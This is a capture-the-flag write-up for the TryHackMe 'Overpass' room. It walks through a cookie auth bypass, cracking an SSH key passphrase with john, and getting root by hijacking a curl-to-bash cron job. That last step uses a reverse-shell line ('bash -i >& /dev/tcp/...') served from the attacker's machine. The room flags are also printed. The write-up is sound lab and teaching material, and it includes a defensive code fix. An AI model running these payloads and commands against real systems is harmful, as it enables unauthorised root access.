TryHackMe-Overpass

Overpass

As usual, start with an nmap scan.

Ports 22 and 80 are open.

A gobuster scan of the web service turns up /admin.

Looking at the page source reveals login.js and cookie.js.

In the file I found this:

const statusOrCookie = await response.text()

if (statusOrCookie === "Incorrect credentials") {
    loginStatus.textContent = "Incorrect Credentials"
    passwordBox.value=""
} else {
    // any other response body is stored as the session cookie as-is
    Cookies.set("SessionToken",statusOrCookie)
    window.location = "/admin"
}

The logic is simple: as long as the request carries a SessionToken cookie, whatever its value, we get in. The server side only checks that the cookie is present, not that it was actually issued by a successful login.
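As an added defensive illustration (not code from the room or from the author), here is the presence-only check described above next to a fixed version that only accepts tokens the server itself issued. The session store, function names and sample cookies are my own assumptions.

```python
import hmac
import secrets
from typing import Dict, Optional

# Constructed server-side session store: issued SessionToken -> username.
# In a real app this lives in memory, a cache or a database, never in the client.
SESSIONS: Dict[str, str] = {}


def issue_session(username: str) -> str:
    """Mint an unguessable token for a user who actually authenticated."""
    token = secrets.token_urlsafe(32)
    SESSIONS[token] = username
    return token


def is_admin_vulnerable(cookies: Dict[str, str]) -> bool:
    """Mirrors the bug in the writeup: any SessionToken value is accepted."""
    return "SessionToken" in cookies


def is_admin_fixed(cookies: Dict[str, str]) -> Optional[str]:
    """Accept only tokens the server issued; return the user or None."""
    presented = cookies.get("SessionToken")
    if not presented:
        return None
    for token, user in SESSIONS.items():
        # constant-time comparison so token bytes do not leak via timing
        if hmac.compare_digest(token, presented):
            return user
    return None


if __name__ == "__main__":
    forged = {"SessionToken": "anything"}           # constructed forged cookie
    print("vulnerable check, forged cookie:", is_admin_vulnerable(forged))
    print("fixed check, forged cookie:", is_admin_fixed(forged))
    real = {"SessionToken": issue_session("james")}  # cookie from a real login
    print("fixed check, issued cookie:", is_admin_fixed(real))
```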

With the cookie set, visiting /admin again returns:

<div class="bodyFlexContainer content">
    <div>
        <p>Since you keep forgetting your password, James, I've set up SSH keys for you.</p>
        <p>If you forget the password for this, crack it yourself. I'm tired of fixing stuff for you.<br>
            Also, we really need to talk about this "Military Grade" encryption. - Paradox

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,
.....

That gives us an encrypted SSH private key and the username james.

Use ssh2john to turn the key into a crackable hash:

┌──(root💀kali)-[/home/sugobet]
└─# ssh2john ./test1.txt > ./hash

Crack the passphrase with john:

┌──(root💀kali)-[/home/sugobet]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt ./hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
james13          (./test1.txt)

Set the key file's permissions to 600 and log in over SSH:

┌──(root💀kali)-[/home/sugobet]
└─# chmod 600 ./test1.txt
┌──(root💀kali)-[/home/sugobet]
└─# ssh james@10.10.251.61 -i ./test1.txt
Enter passphrase for key './test1.txt': 
james@overpass-prod:~$ cat ./user.txt 
thm{65c1aaf000506e56996822c6281e6bf7}

cat /etc/crontab shows a job that runs as root every minute:

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
# Update builds from latest code
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash

The script is fetched over plain HTTP by hostname and piped straight into bash as root, so we can edit /etc/hosts to point overpass.thm at our attacking machine's IP and serve our own buildscript.sh.

On the attacking machine:

┌──(root💀kali)-[/home/sugobet]
└─# mkdir ./downloads/

┌──(root💀kali)-[/home/sugobet]
└─# mkdir ./downloads/src

┌──(root💀kali)-[/home/sugobet]
└─# touch ./downloads/src/buildscript.sh

Contents of buildscript.sh:

#!/bin/bash
bash -i >& /dev/tcp/10.11.17.14/8888 0>&1

Serve the directory on port 80 (with a listener already waiting on port 8888):

python3 -m http.server 80

Wait a minute for the cron job to fire:

Ncat: Connection from 10.10.251.61.
Ncat: Connection from 10.10.251.61:53498.
bash: cannot set terminal process group (2654): Inappropriate ioctl for device
bash: no job control in this shell
root@overpass-prod:~# 
root@overpass-prod:~# cat /root/root.txt
cat /root/root.txt
thm{7f336f8c359dbac18d54fdd64ea753bb}

I also noticed the box runs Ubuntu 18.04 with a working gcc, so CVE-2021-3493 may apply as well.
